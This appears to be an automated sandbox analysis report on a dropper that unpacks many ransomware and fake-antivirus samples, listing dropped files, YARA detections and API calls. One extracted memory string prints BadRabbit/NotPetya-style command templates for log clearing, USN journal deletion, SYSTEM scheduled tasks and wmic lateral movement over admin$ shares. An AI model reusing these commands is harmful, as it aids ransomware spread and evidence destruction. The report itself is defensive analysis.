          Source: Yara matchFile source: 56.0.Endermanch@InfinityCrypt.exe.660000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000038.00000000.470198908.0000000000662000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000038.00000000.470518436.0000000000673000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Endermanch@InfinityCrypt.exe PID: 7424, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, type: DROPPED
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\InfinityCrypt.zip entropy: 7.99452427176Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Krotten.zip entropy: 7.99208020013Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\NoMoreRansom.zip entropy: 7.99977083573Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Petya.A.zip entropy: 7.99868517199Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\PolyRansom.zip entropy: 7.99851934642Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\BadRabbit.zip entropy: 7.99954529182Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Birele.zip entropy: 7.99844368873Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Cerber 5.zip entropy: 7.99902439733Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\DeriaLock.zip entropy: 7.99908454042Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Fantom.zip entropy: 7.99896513348Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Winlocker.VB6.Blacksod.zip entropy: 7.99988062136Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\ViraLock.zip entropy: 7.99846482221Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\WannaCrypt0r.zip entropy: 7.99994536296Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe entropy: 7.99547094116Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Xyeta.zip entropy: 7.99739345362Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Antivirus.zip entropy: 7.99985428104Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Antivirus Platinum.zip entropy: 7.99971875217Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Antivirus Pro 2017.zip entropy: 7.99977078936Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\AnViPC2009.zip entropy: 7.99983383415Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\FakeAdwCleaner.zip entropy: 7.99895130237Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Happy Antivirus.zip entropy: 7.99990323273Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\InternetSecurityGuard.zip entropy: 7.99993910287Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Live Protection Suite 2019.zip entropy: 7.99979933838Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Movie.mpeg.zip entropy: 7.99948436194Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\NavaShield.zip entropy: 7.99997673762Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\PC Defender.zip entropy: 7.99982667621Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\PC Defender v2.zip entropy: 7.99978696478Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\RegistrySmart.zip entropy: 7.99981103656Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Security Central.zip entropy: 7.9998073022Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Security Defender.zip entropy: 7.99986820903Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Security Defender 2015.zip entropy: 7.99962123959Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\SE2011.zip entropy: 7.99992026328Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\SecurityScanner.zip entropy: 7.99992877603Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\SmartDefragmenter.zip entropy: 7.99953631325Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\VAV2008.zip entropy: 7.99974722497Jump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeFile created: C:\Users\user\Desktop\Endermanch@VAV2008.exe entropy: 7.99556481134Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe.EC260F847C726430B64970B467F4035F7B63FF658FA384949D08A892038975A0 entropy: 7.99955528398Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe.EC260F847C726430B64970B467F4035F7B63FF658FA384949D08A892038975A0 entropy: 7.99981702338Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe.EC260F847C726430B64970B467F4035F7B63FF658FA384949D08A892038975A0 entropy: 7.99975811006Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\DAO\dao360.dll.EC260F847C726430B64970B467F4035F7B63FF658FA384949D08A892038975A0 entropy: 7.99965632856Jump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DBGHELP.DLL.EC260F847C726430B64970B467F4035F7B63FF658FA384949D08A892038975A0 entropy: 7.99984324703Jump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E215A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,20_2_04E215A7
          Source: C:\Windows\antivirus-platinum.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main Start Page
          Source: C:\Windows\antivirus-platinum.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main Window Title

          System Summary

          barindex
          Source: 16.0.Endermanch@BadRabbit.exe.1100000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 16.2.Endermanch@BadRabbit.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 20.2.rundll32.exe.1242f28.1.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 16.2.Endermanch@BadRabbit.exe.117f448.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 44.2.870F.tmp.7ff745e00000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
          Source: 20.3.rundll32.exe.1242f28.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 20.2.rundll32.exe.11c5380.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 20.2.rundll32.exe.11c5380.0.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 23.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
          Source: 44.0.870F.tmp.7ff745e00000.1.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
          Source: 44.0.870F.tmp.7ff745e00000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
          Source: 23.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
          Source: 16.0.Endermanch@BadRabbit.exe.1100000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 20.2.rundll32.exe.1242f28.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 20.3.rundll32.exe.1242f28.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 23.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
          Source: 56.0.Endermanch@InfinityCrypt.exe.6631cc.1.unpack, type: UNPACKEDPEMatched rule: Detects InfinityLock ransomware Author: ditekSHen
          Source: 20.2.rundll32.exe.4e20000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 20.2.rundll32.exe.4e20000.2.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 20.3.rundll32.exe.1242f28.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 20.3.rundll32.exe.1242f28.1.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 23.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
          Source: 16.0.Endermanch@BadRabbit.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 44.0.870F.tmp.7ff745e00000.2.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
          Source: 16.0.Endermanch@BadRabbit.exe.1100000.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 20.3.rundll32.exe.1242f28.2.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 20.3.rundll32.exe.11c5380.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 20.3.rundll32.exe.11c5380.3.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 20.3.rundll32.exe.11c5380.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 20.3.rundll32.exe.11c5380.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 20.3.rundll32.exe.1242f28.0.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 56.0.Endermanch@InfinityCrypt.exe.660000.0.unpack, type: UNPACKEDPEMatched rule: Detects InfinityLock ransomware Author: ditekSHen
          Source: 20.2.rundll32.exe.11c5380.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 20.2.rundll32.exe.11c5380.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 00000017.00000000.422069094.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
          Source: 00000017.00000000.415804257.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
          Source: 00000017.00000000.420463459.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
          Source: 00000017.00000000.406263679.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
          Source: 00000014.00000003.431911084.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: Process Memory Space: rundll32.exe PID: 4900, type: MEMORYSTRMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, type: DROPPEDMatched rule: Detects InfinityLock ransomware Author: ditekSHen
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exe, type: DROPPEDMatched rule: Cerber3 Author: pekeinfo
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: C:\Users\user\Desktop\Fantom.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Detects Petya Ransomware Author: Florian Roth
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
          Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: Endermanch@PolyRansom.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: Endermanch@ViraLock.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: Endermanch@SE2011.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: rundll32.exe, 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_00410D7412_2_00410D74
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_0040135712_2_00401357
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_00402CC512_2_00402CC5
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_0040D4FF12_2_0040D4FF
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_00409DE012_2_00409DE0
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_004099A212_2_004099A2
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_00407E0E12_2_00407E0E
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_00409B3612_2_00409B36
          Source: C:\Windows\302746537.exeCode function: 15_2_00406C1015_2_00406C10
          Source: C:\Windows\302746537.exeCode function: 15_2_0040696015_2_00406960
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeCode function: 16_2_0110201D16_2_0110201D
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeCode function: 16_2_0110384016_2_01103840
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeCode function: 16_2_0110173C16_2_0110173C
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeCode function: 16_2_011030E316_2_011030E3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E2A83C20_2_04E2A83C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E2C1E320_2_04E2C1E3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E2C94020_2_04E2C940
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E2270820_2_04E22708
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E2B11D20_2_04E2B11D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E29B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError,20_2_04E29B63
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeSection loaded: avthook.dllJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeSection loaded: 0x1cac30a6.dllJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E29534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,20_2_04E29534
          Source: bpkAAJptGv.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 16.0.Endermanch@BadRabbit.exe.1100000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 16.2.Endermanch@BadRabbit.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.2.rundll32.exe.1242f28.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 16.2.Endermanch@BadRabbit.exe.117f448.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 44.2.870F.tmp.7ff745e00000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 44.2.870F.tmp.7ff745e00000.0.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 20.3.rundll32.exe.1242f28.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 20.2.rundll32.exe.11c5380.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.2.rundll32.exe.11c5380.0.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 23.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 44.0.870F.tmp.7ff745e00000.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 44.0.870F.tmp.7ff745e00000.1.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 44.0.870F.tmp.7ff745e00000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 44.0.870F.tmp.7ff745e00000.0.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 23.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 16.0.Endermanch@BadRabbit.exe.1100000.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 20.2.rundll32.exe.1242f28.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 20.3.rundll32.exe.1242f28.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
